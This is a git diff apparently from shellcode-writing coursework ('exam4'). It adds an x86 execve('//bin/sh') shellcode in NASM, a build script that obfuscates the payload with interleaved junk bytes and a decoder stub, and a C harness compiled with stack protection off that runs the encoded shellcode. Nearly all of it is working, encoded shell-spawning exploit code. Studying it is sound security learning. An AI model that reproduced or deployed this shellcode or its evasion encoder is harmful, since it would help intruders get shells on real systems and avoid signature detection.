diff --git a/exam4/execve-stack.nasm b/exam4/execve-stack.nasm
new file mode 100644
index 0000000..77df821
--- /dev/null
+++ b/exam4/execve-stack.nasm
@@ -0,0 +1,70 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+
+ ;
+ ; =============================== EXECVE =====================================
+ ;
+ ; Now as we forwarded sockfd to a client, we can spawn shell.
+ ; Prepare the path, in little-endian, using the Python
+ ; >>> '//bin/sh'[::-1].encode('hex')
+ ; '68732f6e69622f2f'
+ ;
+ ; int execve(const char *filename, char *const argv[], char *const envp[]);
+ ; EAX EBX, ECX, EDX
+ ; 11 '//bin/sh' PTR to EBX NULL
+ ;
+ ;
+
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
+
+ ; === EXIT(0) ===
+ ; void _exit(int status);
+ ; /usr/include/asm/unistd_32.h:#define __NR_exit 1
+ xor eax, eax ; EAX = 0x000000
+ mov al, 1 ; EAX = 0x000001 1: exit syscall
+ xor ebx, ebx ; EBX = 0x000000 0: success status
+ int 0x80
+
+
+;section .data
diff --git a/exam4/make.sh b/exam4/make.sh
new file mode 100755
index 0000000..66d2e3a
--- /dev/null
+++ b/exam4/make.sh
@@ -0,0 +1,66 @@
+#!/usr/bin/env sh
+#
+# This script will generate shellcode.c and compile it
+#
+
+#
+# Compile the payload and decoder
+#
+echo " [+] Compiling the payload and decoder ..."
+SPAYLOAD=./execve-stack
+nasm -f elf32 -o $SPAYLOAD.o $SPAYLOAD.nasm && ld -m elf_i386 -o $SPAYLOAD $SPAYLOAD.o
+SDECODER=./decoder
+nasm -f elf32 -o $SDECODER.o $SDECODER.nasm && ld -m elf_i386 -o $SDECODER $SDECODER.o
+
+echo " [+] Preparing decoder shellcode ..."
+DECODERSHELLCODE=$(echo -n "\""; for i in $(objdump -d $SDECODER -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done)
+
+#
+# Encode the payload shellcode
+#
+echo " [+] Encoding the payload shellcode ..."
+#
+# $ echo -en '\x37\xFA\xD6\x3F' |ndisasm -b32 -
+# 00000000 37 aaa
+# 00000001 FA cli
+# 00000002 D6 salc
+# 00000003 3F aas
+#
+
+garbage=('\x37' '\xFA' '\xD6' '\x3F');
+ENCPSHELLCODE=$(for i in $(objdump -d $SPAYLOAD |grep "^ " |cut -f2); do echo -n '\x'$i; echo -n ${garbage[$[RANDOM%4]]}; done; echo -n "\xAF\"")
+
+FULL_SHELLCODE=${DECODERSHELLCODE}${ENCPSHELLCODE}
+
+#
+# Generate shellcode.c
+#
+echo " [+] Generating shellcode.c file ..."
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char code[] = \
+$FULL_SHELLCODE;
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+EOF
+
+#
+# Compile C code with GCC
+#
+echo " [+] Compiling shellcode.c with GCC ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+ls -la ./shellcode
+
+#
+# Cleanup
+#
+rm ./$SPAYLOAD ./$SDECODER ./$SPAYLOAD.o ./$SDECODER.o
+
diff --git a/exam4/shellcode b/exam4/shellcode
new file mode 100755
index 0000000..23fc681
Binary files /dev/null and b/exam4/shellcode differ
diff --git a/exam4/shellcode.c b/exam4/shellcode.c
new file mode 100644
index 0000000..51293f1
--- /dev/null
+++ b/exam4/shellcode.c
@@ -0,0 +1,11 @@
+#include
+#include
+
+unsigned char code[] = "\xeb\x22\x5e\x31\xc9\x8a\x06\x46\x3c\x37\x74\xf9\x3c\xfa\x74\xf5\x3c\xd6\x74\xf1\x3c\x3f\x74\xed\x3c\xaf\x74\x06\x88\x04\x0a\x41\xeb\xe3\xff\xd2\xe8\xd9\xff\xff\xff\x31\x37\xc0\x3F\xb0\x37\x0b\xD6\x31\xFA\xd2\x3F\x52\x3F\x68\x3F\x6e\xFA\x2f\xFA\x73\xFA\x68\xFA\x68\xFA\x2f\x37\x2f\xFA\x62\xFA\x69\x37\x89\xD6\xe3\xFA\x52\xD6\x53\xD6\x89\x3F\xe1\xD6\x52\xD6\x89\x37\xe2\xFA\xcd\x37\x80\xD6\x31\xFA\xc0\x37\xb0\x37\x01\x37\x31\x3F\xdb\xD6\xcd\x3F\x80\xFA\xAF";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}